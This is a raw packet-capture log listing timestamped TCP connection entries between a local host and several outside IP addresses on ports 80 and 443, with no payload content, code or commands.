                                                                                                                                                      Oct 3, 2024 09:16:43.780149937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.780160904 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.780178070 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.780214071 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.781099081 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781115055 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781126976 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781138897 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781148911 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781160116 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781171083 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.781263113 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782002926 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782020092 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782032013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782042980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782053947 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782064915 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782074928 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782079935 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782114029 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782854080 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782870054 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782881021 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782891989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782902956 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782910109 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782915115 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782937050 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782964945 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783684015 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783699989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783720016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783730984 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783740997 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783751965 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783751965 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783763885 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.783777952 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783792973 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.783818960 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784509897 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784523964 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784533978 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784544945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784555912 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784559965 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784569979 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784581900 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784584999 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784594059 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784605026 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.784607887 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784625053 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.784642935 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785465002 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785479069 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785490990 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785502911 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785514116 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785523891 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785526991 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785535097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785547018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785553932 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785557985 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.785573006 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.785590887 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786456108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786469936 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786484003 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786495924 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786505938 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786510944 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786518097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786530018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786540985 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786541939 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786551952 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.786557913 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.786587000 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787354946 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787369013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787379980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787403107 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.787434101 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787434101 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.787458897 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.866652966 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866694927 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866704941 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866797924 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.866945982 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866957903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866969109 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.866981030 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867007017 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867022038 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867544889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867556095 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867568016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867578983 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867604971 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867620945 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867706060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867717981 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867729902 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867738962 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.867759943 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.867784977 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868098974 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868110895 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868123055 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868134975 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868165970 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868192911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868612051 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868623018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868638039 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868648052 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868659019 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868669033 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868679047 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.868686914 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868747950 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.868747950 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.869498014 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869509935 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869520903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869532108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869544029 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.869565010 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.869592905 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870026112 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870037079 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870048046 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870058060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870068073 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870078087 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870085955 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870089054 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870104074 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870126009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870901108 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870912075 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870920897 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870932102 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870943069 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870953083 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870963097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870966911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870974064 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.870978117 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.870999098 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.871011972 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.871625900 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871637106 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871646881 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871656895 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871668100 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871676922 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871680021 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.871687889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.871707916 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.871721983 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.872581959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872594118 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872603893 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872613907 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872623920 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872633934 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872641087 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.872644901 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872657061 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.872669935 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.872689009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.873523951 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873534918 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873545885 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873557091 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873567104 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873577118 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873580933 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.873589993 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873600006 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.873604059 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.873620987 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.873647928 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.874218941 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874229908 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874239922 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874249935 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874259949 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874270916 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874273062 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.874281883 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874289036 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.874293089 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874305010 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874310970 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.874315023 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.874330997 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.874351978 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.875170946 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875181913 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875191927 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875202894 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875214100 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875225067 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875233889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875233889 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.875247002 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875252962 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.875257969 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875268936 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.875268936 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.875291109 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.875304937 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876085043 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876099110 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876110077 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876121044 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876136065 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876146078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876151085 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876156092 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876169920 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876178980 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876180887 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876194954 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.876200914 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876226902 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876250029 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.876997948 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877012014 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877022982 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877033949 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877043962 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877053976 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.877054930 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877067089 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877079964 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.877080917 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.877101898 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.877120972 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.905266047 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.905306101 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.905368090 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.905368090 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.905394077 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.905412912 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.905433893 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.905447960 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.905515909 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.905559063 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:44.043067932 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.043118954 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.043190002 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.043448925 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.043462038 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.500061989 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:44.500137091 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.500236034 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:44.506287098 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:44.506325960 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.698726892 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.699282885 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.700094938 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.700114012 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.702106953 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:44.702117920 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.968436003 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.968580008 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:44.970280886 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:44.970299959 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.970568895 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.012515068 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.023279905 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.023313999 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.023463011 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.424705029 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.424807072 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.424887896 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.427829027 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.427829027 CEST49747443192.168.2.6172.67.208.141
                                                                                                                                                      Oct 3, 2024 09:16:45.427855015 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.427865982 CEST44349747172.67.208.141192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.452574015 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.452622890 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.452863932 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.453481913 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.453506947 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.669713020 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.669816017 CEST4434974649.12.197.9192.168.2.6
